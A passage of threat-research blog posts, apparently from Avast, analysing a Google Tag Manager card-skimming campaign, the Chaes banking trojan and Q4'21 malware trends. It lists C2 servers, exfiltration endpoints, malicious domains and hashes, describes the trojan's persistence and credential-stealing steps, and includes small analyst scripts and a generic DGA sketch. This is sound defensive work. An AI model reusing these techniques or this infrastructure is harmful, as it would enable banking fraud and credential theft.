bingfindapi[.]com 2021-04-29 193[.]203[.]203[.]56
webfaset[.]com 2021-04-13 193[.]203[.]203[.]56
pixstatics[.]com 2021-05-19 193[.]203[.]203[.]56
ganalitis[.]com 2021-10-21 91[.]242[.]229[.]96
gstatsc[.]com 2021-12-13 91[.]242[.]229[.]96
gstatlcs[.]com 2021-12-15 193[.]203[.]203[.]14
gstatuslink[.]com 2022-01-02 91[.]242[.]229[.]96
gtagmagr[.]com 2022-01-05 193[.]203[.]203[.]14

The second stage (downloaded from the malicious domain) is a file named favicon (later renamed to refresh) that contains about 400 lines of obfuscated JavaScript code. We found that this code changed over time to avoid detection. The deobfuscated code is shown below; almost everything in the 400 lines was just obfuscation. This file hides malicious code responsible for downloading the final stage through WebSockets.

The final stage of the malware is downloaded through WebSockets. First, the web page sends its hostname, and the corresponding malicious JavaScript is returned based on that information. This communication is shown in the image below.

The malicious JavaScript code is about 1,000 lines long (formatted) and, like the previous stage, is obfuscated. This code is responsible for stealing the payment details. At the end of the obfuscated JavaScript code (shown in the image below) is a configuration which is different for every infected e-shop. The red box at the bottom shows the configuration of where the fake payment form will be inserted into an HTML file on the infected website.

The end of the third stage file that contains configuration

The code from the yellow box is decoded in the white box. It is a dictionary; the key E528330211747l contains the form field names that match the input form field names on the infected webpage. The last key contains an exfiltration URL encoded in base64. The image below shows code from an infected website, where we can see that the id of the email field (customer-email) appears in the mentioned code.

The missing field names (for the fake payment form) are stored in the variable a0_0x11ac38, an array that contains the following fields:

The fake payment form embedded on the infected website is shown in the image below. Above is the infected webpage, while below is how the webpage looks normally.

E-commerce website with fake payment form

The stolen payment details (including details such as name and address) are sent to the attacker encoded in base64 through WebSockets.
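For illustration, recovering the base64-encoded exfiltration URL from such a configuration takes only a few lines of Python. The dictionary below is a hypothetical stand-in that mirrors the structure described above; apart from the customer-email field id, the key names, field names, and URL are our own placeholders, not values from the sample:

```python
import base64

# Hypothetical skimmer configuration mirroring the structure described above.
# Only "customer-email" comes from the analyzed sample; everything else here
# (the exfil_url key, the other field ids, the URL) is an illustrative placeholder.
config = {
    "E528330211747l": ["customer-email", "cc_number", "cc_cid"],
    "exfil_url": base64.b64encode(b"https://example-skimmer.invalid/collect").decode(),
}

def decode_exfil_url(cfg: dict) -> str:
    """Base64-decode the exfiltration URL stored in a skimmer config."""
    return base64.b64decode(cfg["exfil_url"]).decode()

print(decode_exfil_url(config))  # https://example-skimmer.invalid/collect
```

The same one-liner is handy during triage: base64-decoding any suspicious string constants in a skimmer's configuration often reveals the exfiltration endpoint directly.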

Affected users

The map below shows the countries with the most affected users. At the top is Argentina, because of prune[.]com[.]ar, a site that was infected with the new malicious domain gstatlcs[.]com.

The second is the Saudi Arabian e-commerce website souqtime[.]com. From RiskIQ data, we can see that this e-commerce website was infected over time with at least seven different web skimming domains.

Currently Avast detects the malicious domain gstatuslink[.]com on souqtime[.]com.


Overall, we can say that the attacker used Google Tag Manager to avoid detection. They changed the domains from which the malicious code was loaded over time, and also changed the malicious code itself to hide from antivirus detection.

Some websites were infected for several months (for example souqtime[.]com). It can be difficult for users to spot that the site is infected. For example, it is suspicious if the user fills in the payment form on the website itself and is then redirected to another payment form on the payment gateway webpage. But in cases where the payment form is normally present directly on the e-commerce website and the attacker steals payment details from this legitimate form, it is really hard to notice that the website is infected. Therefore we recommend using a second factor (e.g. mobile app or SMS code) to confirm internet payments if the bank supports it.

Website owners should keep their software updated, monitor logs for any suspicious activity, use strong passwords, and deploy a Web Application Firewall.

IoCs (malicious domains):

  • pixstatics[.]com
  • ganalitics[.]com
  • bingfindapi[.]com
  • webfaset[.]com
  • ganalitis[.]com
  • gstatsc[.]com
  • gstatlcs[.]com
  • gstatuslink[.]com
  • gtagmagr[.]com

The post Web Skimming Attacks Using Google Tag Manager appeared first on Avast Threat Labs.

Chasing Chaes Kill Chain

25 January 2022 at 13:43


Chaes is a banking trojan that operates solely in Brazil and was first reported in November 2020 by Cybereason. In Q4 2021, Avast observed an increase in Chaes' activity, with infection attempts detected from more than 66,605 of our Brazilian customers. In our investigation, we found that the malware is distributed through many compromised websites, including highly credible ones. Overall, Avast has found Chaes artifacts on more than 800 websites, over 700 of which have Brazilian TLDs. All compromised websites are WordPress sites, which leads us to speculate that the attack vector could be the exploitation of vulnerabilities in the WordPress CMS; however, we were unable to perform forensics to confirm this theory. We immediately shared our findings with the Brazilian CERT (BR Cert) in the hope of preventing Chaes from spreading. At the time of publication, Chaes artifacts still remain on some of the websites we observed.

Chaes is characterized by a multiple-stage delivery that utilizes scripting frameworks such as JScript, Python, and NodeJS, binaries written in Delphi, and malicious Google Chrome extensions. The ultimate goal of Chaes is to steal credentials stored in Chrome and intercept logins on popular banking websites in Brazil.

In this post, we present the results of our analysis of the Chaes samples we found in Q4 2021. Future updates on the latest campaign will be shared via Twitter or in a later post.

Infection Scheme

When someone reaches a website compromised by Chaes, they are presented with the pop-up below, asking them to install the Java Runtime application:

If the user follows the instructions, they will download a malicious installer that poses as a legitimate Java Installer. As shown below, the fake installer closely imitates the legitimate Brazilian Portuguese Java installer in terms of appearance and behavior.

Once the installation begins, the user's system is compromised. After a few minutes, all web credentials, history, and user profiles stored by Chrome will be sent to the attackers. Users may notice Google Chrome being closed and restarted automatically. This indicates that any future interactions with the following Brazilian banking websites will be monitored and intercepted:


Technical Analysis

Infected websites

Upon inspecting the HTML code of the compromised websites, we found the malicious script inserted as shown below:

In this case, V=28 likely represents the version number. We also found URLs with other versions:

  • https://is[.]gd/EnjN1x?V=31
  • https://is[.]gd/oYk9ielu?D=30
  • https://is[.]gd/Lg5g13?V=29
  • https://is[.]gd/WRxGba?V=27
  • https://is[.]gd/3d5eWS?V=26

The script creates an HTML element that stays on top of the page with “Java Runtime Download” lure. This element references an image from a suspicious URL

  • https://sys-dmt[.]net/index.php?D\
  • https://dmt-sys[.]net/

and an on-click download of a Microsoft Installer from

  • https://bkwot3kuf[.]com/wL38HvYBiOl/index.php?get or
  • https://f84f305c[.]com/aL39HvYB4/index.php?get or
  • https://dragaobrasileiro[.]

Microsoft Installer

The flowchart below shows the infection chain following the malicious installer execution.

Inside the MSI package

The installer contains three malicious JS files, install.js, sched.js, and sucesso.js, renamed to Binary._ as shown above. Each of them handles a different task, but all are capable of reporting their progress to the specified CnC:

Implementation of the logging function across all 3 scripts


The first script, install.js, downloads and executes a setup script called runScript, which prepares the proper Python environment for the next-stage loader. After an HTTP request to a hardcoded domain, the obfuscated runScript is downloaded and then executed to perform the following tasks:

  • Check for Internet connection (using
  • Create %APPDATA%\\<pseudo-random folder name>\\extensions folder
  • Download password-protected archives such as python32.rar/python64.rar and unrar.exe to that extensions folder
  • Write the path of the newly created extensions folder to HKEY_CURRENT_USER\\Software\\Python\\Config\\Path
  • Perform some basic system profiling
  • Execute unrar.exe command with the password specified as an argument to unpack python32.rar/python64.rar
  • Connect to C2 and download 32bit and 64bit scripts along with 2 encrypted payloads. Each payload has a pseudo-random name.
runScript.js content
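Several of these artifacts lend themselves to simple triage checks. The sketch below is our own minimal example (not Avast tooling): it looks for the "<pseudo-random folder>\extensions" layout that runScript creates under %APPDATA%. On a live Windows system, the registry value HKEY_CURRENT_USER\Software\Python\Config\Path would point at the same folder.

```python
import os

def find_chaes_extension_dirs(appdata_dir: str) -> list:
    """Return '<pseudo-random folder>/extensions' paths under the given
    APPDATA directory -- the folder layout created by Chaes' runScript."""
    hits = []
    for name in os.listdir(appdata_dir):
        candidate = os.path.join(appdata_dir, name, "extensions")
        if os.path.isdir(candidate):
            hits.append(candidate)
    return hits

# On a real Windows system:
#   find_chaes_extension_dirs(os.environ["APPDATA"])
```

Note that the folder name itself is pseudo-random, so a triage script has to match on the layout rather than on a fixed name.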


The second script, sched.js, sets up persistence and guarantees the execution of the payloads downloaded by runScript in the previous step. Sched.js accomplishes this by creating a Scheduled Task as its primary means and a Startup link as a backup. Both ultimately maintain the after-reboot execution of the following command:

 ...\\<python32|python64>\\pythonw.exe /m

ScheduledTask Configuration


Finally, sucesso.js reports to the CnC that the initial installation on the victim's computer has succeeded and that the system is ready for the next stage.

Python Loader Chain

The Scheduled Task created by sched.js eventually starts, which initiates the Python in-memory loading chain. The loading chain involves many layers of Python scripts, JS scripts, shellcode, Delphi DLLs, and a .NET PE, which we will break down in this section. Impressively, the final payload is executed within the Python processes (PIDs 2416 and 4160) as shown below:

Obfuscated content

The script XOR-decrypts and decompresses the pseudo-randomly named file downloaded by runScript.js into another Python script. The new Python script contains two embedded payloads, image and shellcode, in encrypted form. Image represents the Chaes loader module called chaes_vy.dll, while shellcode is an in-memory PE loader. We found this particular loader shellcode reappearing many times in the later stages of Chaes. By running the shellcode using the CreateThread API with proper parameters pointing to chaes_vy.dll, the Python script eventually loads chaes_vy.dll into memory:

chaes_vy.dll is loaded into memory by an embedded shellcode
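An analyst-side decoder for this kind of layer can be sketched as follows. The repeating-key XOR and zlib compression here are assumptions for illustration; the actual key and compression scheme have to be recovered from the downloaded Python script itself:

```python
import zlib
from itertools import cycle

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; self-inverse, so one routine encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def decode_layer(blob: bytes, key: bytes) -> bytes:
    """XOR-decrypt a payload, then decompress it (zlib assumed here)."""
    return zlib.decompress(xor_bytes(blob, key))
```

Because XOR is self-inverse, the same xor_bytes routine also reproduces an encrypted blob from a plaintext one, which makes the round trip easy to unit-test.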


Chaes_vy is a Delphi module that loads an embedded .NET executable, which in turn runs two JavaScript files: script.js and engine.js. These two scripts hold the core functionality of the Chaes_vy module.


This script acts as the interface between the .NET framework and the JScript framework, providing the necessary utilities to execute any scripts and modules that engine.js downloads in the future. By default, script.js will try to retrieve the paths to the payloads specified in the argument. If nothing is found, it will execute engine.js.


This script employs two methods of retrieving a JS payload: getBSCode() and getDWCode(), both called every six minutes.

getBSCode is the primary method, and the only one we observed serving a payload. The encrypted payload is hidden as commented-out code inside the HTML page of a Blogspot blog, shown below. To anyone not infected by Chaes, this site is completely harmless.

View of the Blogspot page containing hidden malicious code

When executed, engine.js parses the string starting from <div id="rss-feed">, which is the marker of the encrypted payload:

Hidden code

After decrypting this text using AES with a hardcoded key, instructions.js is retrieved and executed. This script is in charge of downloading and executing Chaes’ malicious Chrome “extensions”. More info about instructions.js is provided in the next section.

getDWCode is the secondary method of retrieving instructions.js. It employs a DGA approach to find an active domain each week when getBSCode fails. Since we were not able to observe this method being used successfully in the wild, we have no analysis to present here. However, you can check out the full algorithm posted on our GitHub.
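We have deliberately not reproduced Chaes' actual algorithm here, but the hypothetical sketch below shows the general shape of a weekly DGA: a seed plus the current ISO year and week number is hashed, and the digest is mapped onto a domain name, so every infected machine independently computes the same domain for a given week. All constants in it (the seed, the TLD pool, the name length) are made up:

```python
import datetime
import hashlib

TLDS = [".com", ".net", ".org"]  # hypothetical TLD pool

def weekly_domain(date: datetime.date, seed: str = "example-seed") -> str:
    """Generic weekly DGA sketch: identical output for every day of one ISO week."""
    year, week, _ = date.isocalendar()
    digest = hashlib.sha256(f"{seed}-{year}-{week}".encode()).hexdigest()
    # Map the first 12 hex digits onto lowercase letters for the domain name
    name = "".join(chr(ord("a") + int(c, 16) % 26) for c in digest[:12])
    return name + TLDS[int(digest[12], 16) % len(TLDS)]
```

The operator, knowing the seed, can pre-register the upcoming week's domain; a defender who recovers the real algorithm can compute the same domains in advance and sinkhole them.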


Instructions.js is the last stage of the delivery chain. Nothing up to this point has gained the attacker any true benefit. It is the job of instructions.js to download and install all the malicious extensions that will take advantage of the Chrome browser and harm infected users. The addresses of all payloads are hardcoded, as shown below:

The extensions are delivered either as password-protected archives or as encrypted binaries. The non-compressed payloads are PE files that can run independently, while the compressed ones add the NodeJS packages necessary for the extension to run. Below is an example of the chremows63_64 archive contents:

All the binaries with the dll_filename argument, such as chromeows2.bin, are encrypted, including the ones inside the RAR archive. The decryption algorithm is located inside script.js, as we mentioned in the previous section. To decrypt and run each binary, Chaes needs to call it with the file path specified as an argument.

The extension installation can be simplified into the following steps:

  • An HTTP request (aws/isChremoReset.php) is sent to check whether Google Chrome under a particular uid has been hooked. If not, Chrome and NodeJS will be closed. More information about uid can be found in the "Online" section below.
  • The download request is constructed based on 3 scenarios: 32bit, 64bit, and no Google Chrome found. Each scenario will contain suitable versions of the extensions and their download links.
  • The extension is downloaded. The compressed payload will be unpacked properly.
  • A hosts file is created for the newly downloaded module. Inside the file is the CnC randomly picked from the following pool:

Each extension will use the address specified in hosts for CnC communication

  • Launch each extension through python.exe with proper arguments as shown below



Online

online.dll is a short-lived Delphi module that is executed by instructions.js before the other modules are deployed. Its main purpose is to fingerprint the victim by generating a uid, a concatenation of drive C:'s VolumeSerialNumber, UserName, and ComputerName. The uid is written to the registry key SOFTWARE\\Python\\Config\\uid before being included in the beaconing message.

This registry key is also where instructions.js gets the uid it uses when asking the CnC whether the victim's Chrome has been hooked. The first time instructions.js is launched, this registry key has not been created yet, which is why the Chrome process is always killed.

Online.dll retrieves the CnC server specified in the hosts file and performs the beaconing request /aws/newClient.php, sending the victim’s uid and basic system information.

Mtps4 (MultiTela Pascal)

Module mtps4 is a backdoor written in Delphi. Its main purpose is to connect to the CnC and wait for a PascalScript to execute in response. As with the previous module, the CnC is retrieved from the hosts file. Mtps4 sends a POST request to the server with a hardcoded User-Agent containing the uid and the command type. It currently supports two commands: start and reset. If the reset command is answered with '(* SCRIPT OK *)', it will terminate the process.

The start command is a bit more interesting.

Example of an HTTP request with “start” command

As a reply to this command, it expects to receive PascalScript code containing the comment (* SCRIPT OK *).

mtps4 is compiled with support for PascalScript. Before running the script, it creates a window that copies the screen and covers the entire desktop, to avoid raising suspicion while performing malicious tasks on the system.

Unfortunately, during the investigation we couldn't get hold of the actual script from the CnC.

Chrolog (ChromeLog)

Chrolog is a Google Chrome password stealer written in Delphi. Although it is listed as an extension, Chrolog is an independent tool that extracts the user's personal data from the Chrome database and exfiltrates it through HTTP. The CnC server is also retrieved from the hosts file previously created by instructions.js.

HTTP Request Data Exfiltration
/aws/newUpload.php Cookies, Web Data, and Login Data (encrypted)
/aws/newMasterKey.php Chrome Master Key used to decrypt Login Data
/aws/newProfileImage.php Profile Image URL collected from last_downloaded_gaia_picture_url_with_size attribute inside Local State
/aws/newPersonalData.php Username, fullname, gaia_name
/aws/bulkNewLogin.php All Login Data is decrypted and added to local.sql database. Then the corresponding section of the database is exfiltrated
/aws/bulkNewUrl.php History is added to local.sql database. Then the corresponding section of the database is exfiltrated
/aws/bulkNewAdditionalData.php Web Data is written to local.sql database. Then the corresponding section of the database is exfiltrated
/aws/bulkNewProcess.php All running processes are collected and written to local.sql database. Then the corresponding section of the database is exfiltrated
(Cookies, Web Data, Login Data, History, and Local State are typically located in %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\)

Chronodx (Chrome Noder)

chronodx.rar contains NodeJS packages and chronodx.bin, aka Chronod2.dll.
Chronodx dependency (“name”: “chremows” is indeed how it is defined)

The chronodx extension package can be separated into two parts: a loader called Chronod2.dll and a JavaScript banking trojan called index_chronodx2.js. First, Chronod2.dll performs an HTTP request (/dsa/chronod/index_chronodx2.js) to retrieve index_chronodx2.js. If successful, Chronod2.dll will run silently in the background until it detects a Chrome browser opened by the user. When that happens, it will close the browser and reopen its own instance of Chrome, with index_chronodx2.js run from the node.exe process.

Chronodx in idle mode
Chronodx reopens Chrome and executes the "node.exe index.js" command
Index.js is index_chronodx2.js in this case

Index_chronodx2.js utilizes puppeteer-core, a NodeJS framework that provides APIs to control the Chrome browser, for malicious purposes. Index_chronodx2.js implements many features to intercept popular banking websites in Brazil, including:


Upon a visit to any of the above websites, index_chronodx2.js will start collecting the victim's banking info and sending it to the attacker through a set of HTTP commands. The CnC server is stored in the hosts file; when that file is not found on the system, a hardcoded backup CnC is used instead:

C2 Command Meaning
/aws/newQRMPClient.php Supposedly sending user info to the attacker when a QR code scan is found on banking websites listed above, but this feature is currently commented out
/aws/newContaBBPF.php Sending user banking info when Bancodobrasil banking sites are intercepted
/aws/newContaCef.php Sending user banking info when Caixa banking sites are intercepted
/aws/newCaixaAcesso.php Telling the attacker that a victim has accessed Caixa banking page
/aws/newMercadoCartao.php Sending user banking info when Mercado banking sites are intercepted
/aws/newExtraLogin.php Send user credentials when logging in to one of the listed pages

Chremows (Chrome WebSocket)

Chremows is another extension that uses NodeJS and puppeteer-core, and is similar in functionality to the node.js module mentioned in the Cybereason 2020 report. Chremows targets two platforms, Mercado Livre and Mercado Pago, which both belong to an online marketplace company called Mercado Libre, Inc.

Chremows dependency

Sharing the same structure as the chronodx module, chremows contains a loader, CreateChrome64.dll, that downloads a JavaScript-based banking trojan called index.js. CreateChrome64.dll automatically updates index.js when a newer version is found. Unlike chronodx, chremows executes index.js immediately after download and doesn't require Google Chrome to be opened. In a separate thread, CreateChrome64.dll loads an embedded module, ModHooksCreateWindow64.dll, that Cybereason analyzed in their 2020 report. Overall, this module helps increase the capabilities that chremows has over Google Chrome, allowing the attacker to perform "active" tasks such as sending keypresses and mouse clicks to Chrome, or opening designated pages. Finally, CreateChrome64.dll copies Chrome's Local State file to the same location as index.js under the name local.json. Index.js uses local.json to help the attacker identify the victim.

Hardcoded CnC

Index.js employs two methods of communicating with the attacker: WebSocket and HTTP. Each method has its own set of C2 servers, as shown in the picture above. WebSocket is used to receive commands and send client-related messages, while HTTP is used to exfiltrate financial data such as banking credentials and account information.

List of known Index.js WebSocket commands

Command from C2 Functionality
welcome:: Send uid and information extracted from local.json to the attacker
control:: The attacker establishes control over Google Chrome
uncontrol:: The attacker removes control over Google Chrome
ping:: Check if the connection to the client is OK
command:: Send command such as keystroke, mouseclick
openbrowser:: Open Chrome window with minimal size to stay hidden

If the victim stays connected to the WebSocket C2 server, every six minutes the malware automatically goes to the targeted Mercado Pago and Mercado Livre pages and performs malicious tasks. During this routine, the attacker loses direct control of the browser. The target pages are banking, credit, and merchant pages that require the user's login. If the user has not logged out of these pages, the attacker will start to collect data and exfiltrate it through the following HTTP requests:

  • /aws/newMercadoCredito.php
  • /aws/newMercadoPago.php

If the user is not logged in to those pages but has the password saved in Chrome, the attackers will regain direct control of Chrome after the routine ends and log in manually.


Chaes exploits many WordPress websites to serve malicious installers. Among them are a few notable websites, for which we did our best to notify BR Cert. The malicious installer communicates with remote servers to download the Python framework and malicious Python scripts, which initiate the next stage of the infection chain. In the final stage, malicious Google Chrome extensions are downloaded to disk and loaded within the Python process. The Google Chrome extensions are able to steal users' credentials stored in Chrome and collect users' banking information from popular banking websites.


The full list of IoCs is available here


HTML Scripts

  • is[.]gd/EnjN1x?V=31
  • is[.]gd/oYk9ielu?D=30
  • is[.]gd/Lg5g13?V=29
  • tiny[.]one/96czm3nk?v=28
  • is[.]gd/WRxGba?V=27
  • is[.]gd/3d5eWS?V=26

MSI Download URLs

  • dragaobrasileiro[.]
  • chopeecia[.]
  • bodnershapiro[.]com/blog/wp-content/themes/twentyten/p.php?
  • dmt-sys[.]net/index.php?
  • up-dmt[.]net/index.php?
  • sys-dmt[.]net/index.php?
  • x-demeter[.]com/index.php?
  • walmirlima[.]
  • atlas[.]
  • apoiodesign[.]com/language/overrides/p.php?

CnC Servers

  • 200[.]234.195.91
  • f84f305c[.]com
  • bkwot3kuf[.]com
  • comercialss[.]com
  • awsvirtual[.]
  • cliq-no[.]link
  • 108[.]166.219.43
  • 176[.]123.8.149
  • 176[.]123.3.100
  • 198[.]23.153.130
  • 191[.]252.110.241
  • 191[.]252.110.75

SHA256 Hashes

Filename Hash
MSI installer f20d0ffd1164026e1be61d19459e7b17ff420676d4c8083dd41ba5d04b97a08c
7a819b168ce1694395a33f60a26e3b799f3788a06b816cc3ebc5c9d80c70326b 70135c02a4d772015c2fce185772356502e4deab5689e45b95711fe1b8b534ce
runScript.js bd4f39daf16ca4fc602e9d8d9580cbc0bb617daa26c8106bff306d3773ba1b74
engine.js c22b3e788166090c363637df94478176e741d9fa4667cb2a448599f4b7f03c7c
image 426327abdafc0769046bd7e359479a25b3c8037de74d75f6f126a80bfb3adf18
chremows fa752817a1b1b56a848c4a1ea06b6ab194b76f2e0b65e7fb5b67946a0af3fb5b
chrolog 9dbbff69e4e198aaee2a0881b779314cdd097f63f4baa0081103358a397252a1
chronod ea177d6a5200a39e58cd531e3effb23755604757c3275dfccd9e9b00bfe3e129
online 3fd48530ef017b666f01907bf94ec57a5ebbf2e2e0ba69e2eede2a83aafef984
mtps4 5da6133106947ac6bdc1061192fae304123aa7f9276a708e83556fc5f0619aab

The post Chasing Chaes Kill Chain appeared first on Avast Threat Labs.

Avast Q4/21 Threat report

26 January 2022 at 21:18


Welcome to the Avast Q4’21 Threat Report! Just like the rest of last year, Q4 was packed with many surprises and plot twists in the threat landscape. Let me highlight some of them.

We all learned how much impact a small library for logging can have. Indeed, I’m referring to the Log4j Java library, where a vulnerability was discovered and immediately exploited. The rate at which malware operators exploited the vulnerability was stunning. We observed coinminers, RATs, bots, ransomware, and of course APTs abusing the vulnerability faster than a software vendor could say “Am I also using this Log4j library somewhere below?”. In a nutshell: Christmas came early for malware authors.

Original credits: XKCD

Furthermore, in my Q3’21 foreword, I mentioned the take-down of botnet kingpin, Emotet. We were curious which bot would replace it… whether it would be Trickbot, IcedID, or one of the newer ones. But the remaining Emotet authors had a different opinion, and pretty much said “The king is dead, long live the king!”, they rewrote several Emotet parts, revived their machinery, and took the botnet market back with the latest Emotet reincarnation.

Out of the other Q4’21 trends, I would like to highlight an interesting symbiosis of a particular adware strain that is protected by the Cerbu rootkit, which was very active in Africa and Asia. Furthermore, coinminers increased by 40% worldwide by infecting webpages and pirated software. In this report, we also provide a sneak peek into our recent research of banking trojans in Latin America and also dive into the latest in the mobile threat landscape.

Last but not least, Q4’21 was also special in terms of ransomware. However, unlike in previous quarters when you could only read about massive increases in attacks, ransom payments, or high-profile victims, Q4 brought us a long-awaited drop of ransomware activity by 28%! Why? Please, continue reading.

Jakub Křoustek, Malware Research Director


This report is structured as two main sections: Desktop, informing about our intel from Windows, Linux, and macOS, and Mobile, where we inform about Android and iOS threats.

Furthermore, in this report we use the term risk ratio to describe the severity of particular threats. It is calculated as a monthly average of the number of attacked users divided by the number of active users in a given country. Unless stated otherwise, the risk ratio is only available for countries with more than 10,000 active users per month.
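As a worked illustration of the formula above, here is a minimal sketch with invented figures (none of these numbers are Avast telemetry):

```python
# Hypothetical illustration of the risk ratio described above.
# All figures are invented for the example, not real telemetry.
monthly_attacked_users = [1200, 1500, 1350]    # one value per month in the quarter
monthly_active_users   = [60000, 62000, 61000]

# Risk ratio per month = attacked users / active users
monthly_ratios = [a / b for a, b in zip(monthly_attacked_users,
                                        monthly_active_users)]

# The reported figure is the monthly average over the quarter
risk_ratio = sum(monthly_ratios) / len(monthly_ratios)
print(f"{risk_ratio:.2%}")  # prints 2.21% for these made-up inputs
```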


Advanced Persistent Threats (APTs)

Advanced Persistent Threats are typically created by Nation State sponsored groups which, unlike cybercriminals, are not solely driven by financial gain. These groups pursue nation states’ espionage agenda, which means that specific types of information, be it of geopolitical importance, intellectual property, or even information that could be used as a base for further espionage, are what they are after.

In December, we described a backdoor we found in a lesser known U.S. federal government commission. The attackers were able to run code on an infected machine with System privileges and used the WinDivert driver to read, filter and edit all network communication of the infected machine. After several unsuccessful attempts to contact the targeted commission over multiple channels, we decided to publish our findings in December to alert other potential victims of this threat. We were later able to engage with the proper authorities who are in possession of our full research and took action to remediate the threat.

In early November last year, we noticed the LuckyMouse APT group targeting two countries: Taiwan and the Philippines. LuckyMouse used a DLL sideloading technique to drop known backdoors. We spotted a combination of the HyperBro backdoor and the Korplug backdoor being used. The dropped files were signed with a valid certificate of Cheetah Mobile Inc.

The top countries where we saw high APT activity were: Myanmar, Vietnam, Indonesia, and Ukraine. An actor known as Mustang Panda is still active in Vietnam. We also tracked a new campaign in Indonesia that appears to have been initiated in Q4’21.

The Gamaredon activity we observed in Q3’21 in Ukraine dropped significantly about a week before the Ukrainian Security Service publicly revealed information regarding the identities of the Gamaredon group members. Nevertheless, we still saw an increase in APT activity in the country. 

Luigino Camastra, Malware Researcher
Igor Morgenstern, Malware Researcher
Daniel Beneš, Malware Researcher


Adware, as the name suggests, is software that displays ads, often in a disturbing way, without the victim realizing what is causing the ads to be displayed. We primarily monitor adware that is potentially dangerous and is capable of adding a backdoor to victims’ machines. Adware is typically camouflaged as legitimate software, but with an easter egg.

Desktop adware has become more aggressive in Q4’21, illustrated in the graph below. In comparison to Q3’21, we saw a significant rise in adware in Q4’21 and a serious peak at the beginning of Q4’21. Moreover, the incidence trend of adware in Q4’21 is very similar to the rootkit trend, which will be described later. We believe these trends are related to the Cerbu rootkit that can hijack requested URLs and then serve adware.

The risk ratio of adware has increased by about 70% worldwide in contrast to Q3’21. The most affected regions are Africa and Asia.

In terms of regions where we protected the most users from adware, users in Russia, the U.S., and Brazil were targeted the most in Q4’21.

Martin Chlumecký, Malware Researcher


The last quarter of 2021 was everything but uneventful in the world of botnets. Celebrations of Emotet’s takedown were still ongoing when we started to see Trickbot being used to resurrect the Emotet botnet. It looks like “Ivan” is still not willing to retire and is back in business. As if that wasn’t enough, we witnessed a change in Trickbot’s behavior. As can be seen in the chart below, by the end of November, attempts at retrieving the configuration file largely failed. By the middle of December, this affected all the C&Cs we have identified. While we continue to observe traffic flowing to a C&C on the respective ports, it does not correspond to the former protocol.

Just when we thought we were done with surprises, December brought the Log4shell vulnerability, which was almost immediately exploited by various botnets. It ought to be no surprise that one of them was Mirai, again. Moreover, we saw endpoints being hammered with bots trying to exploit the vulnerability. While most of the attempts led to DNS logging services, we also noticed several attempts that tried to load potentially malicious code. We observed one interesting thing about the Log4shell vulnerability: While a public endpoint might not be vulnerable to Log4shell, it could still be exploited if logs are sent from the endpoint to another logging server.

Below is a heatmap showing the distribution of botnets that we observed in Q4 2021.

As for the overall risk ratios, the top of the table hasn’t changed much since Q3’21 and is still occupied by Afghanistan, Turkmenistan, Yemen, and Tajikistan. What has changed is their risk ratios have significantly increased. A similar risk ratio increase occurred for Japan and Portugal, even though in absolute value their risk ratio is still significantly lower than in the aforementioned countries. The most common botnets we saw in the wild are:

  • Phorpiex
  • BetaBot
  • Tofsee
  • Mykings
  • MyloBot
  • Nitol
  • LemonDuck
  • Emotet
  • Dorkbot
  • Qakbot

Adolf Středa, Malware Researcher


Even though cryptocurrencies experienced turbulent times, we actually saw an increase in malicious coin mining activity: it increased by a whopping 40% in our user base in Q4’21, as can be seen in the daily spreading chart below. This increase could also have been influenced by the peak in Ethereum and Bitcoin prices in November.

The heat map below shows that in comparison to the previous quarter, there was a higher risk of a coin miner infection for users in Serbia and Montenegro. This is mainly due to the wider spreading of web miners in these regions, which attempt to mine cryptocurrencies while the victim is visiting certain webpages. XMRig is still the leading choice among popular coinminers.

CoinHelper is one of the prevalent coinminers that was still very active throughout Q4’21, mostly targeting users in Russia and Ukraine. When the malware is executed on a victim’s system, CoinHelper downloads the notorious XMRig miner via the Tor network and starts to mine. Apart from coin mining, CoinHelper also harvests various information about its victims: their geolocation, what AV solution they have installed, and what hardware they are using.

The malware is being spread in the form of a bundle with many popular applications: cracked software such as MS Office, games and game cheats like Minecraft and Cyberpunk 2077, and even clean installers such as Google Chrome or AV products, as well as hiding in a Windows 11 ISO image, among many others. The spread is further amplified by seeding the bundled apps via torrents, abusing the unofficial way of downloading software.

Even though we observed multiple cryptocurrencies, including Ethereum and Bitcoin, configured to be mined, one particular currency stood out: Monero. Even though Monero is designed to be anonymous, thanks to the incorrect usage of addresses and the mechanics of how mining pools work, we were able to get a deeper look into the malware authors’ Monero mining operation and find out that the total monetary gain of CoinHelper was 339,694.86 USD as of November 29, 2021.

Cryptocurrency Earnings in USD Earnings in cryptocurrency Number of wallets
Monero $292,006.08 1,216.692 [XMR] 311
Bitcoin $46,245.37 0.800 [BTC] 54
Ethereum $1,443.41 0.327 [ETH] 5
Table with monetary gain (data refreshed 2021-11-29)

Since the release of our CoinHelper blog post, the miner mined an additional ~15.162 XMR as of December 31, 2021, which translates to ~3,446.03 USD. Based on this, we can say that at the turn of 2021, CoinHelper was still actively spreading and mining ~0.474 XMR every day.
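The daily rate quoted above follows from simple arithmetic over the 32 days between November 29 and December 31, 2021; a quick sanity check of the reported figures:

```python
# Sanity-check the CoinHelper figures quoted above.
xmr_mined = 15.162     # XMR mined between Nov 29 and Dec 31, 2021
days = 32              # number of days in that window
usd_value = 3446.03    # reported USD equivalent of the mined XMR

xmr_per_day = xmr_mined / days        # daily mining rate
usd_per_xmr = usd_value / xmr_mined   # implied Monero price used

print(f"~{xmr_per_day:.3f} XMR/day")            # ~0.474 XMR/day, as reported
print(f"implied ~{usd_per_xmr:.2f} USD per XMR")  # ~227.28 USD/XMR
```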

Jan Rubín, Malware Researcher
Jakub Kaloč, Malware Researcher

Information Stealers

In comparison with the previous quarters, we saw a slight decrease in information stealer activity. The reason behind this is mainly a significant decrease in Fareit infections, which dropped by 61%. This places Fareit in sixth position, down from its previously dominant first rank, now holding roughly 9% of the market share. To this family, as well as to all the others, we wish a happy dropping in 2022!

The most prevalent information stealers in Q4’21 were AgentTesla, FormBook, and RedLine stealers. If you happen to get infected by an infostealer, there is almost a 50% chance that it will be one of these three.

Even though infostealers are traditionally popular around the world, there are certain regions where there is a greater risk of encountering one. Users in Singapore, Yemen, Turkey, and Serbia are most at risk of losing sensitive data. Out of these countries, we only saw an increase in risk ratio in Turkey when comparing the ratios to Q3’21.

Finally, malware strains based on Zeus still dominate the banking-trojan sector with roughly 40% of the market share. However, one of these strains, the Citadel banker, experienced a significant drop in Q4’21, providing ClipBanker space to grow.

Jan Rubín, Malware Researcher

LatAm Region

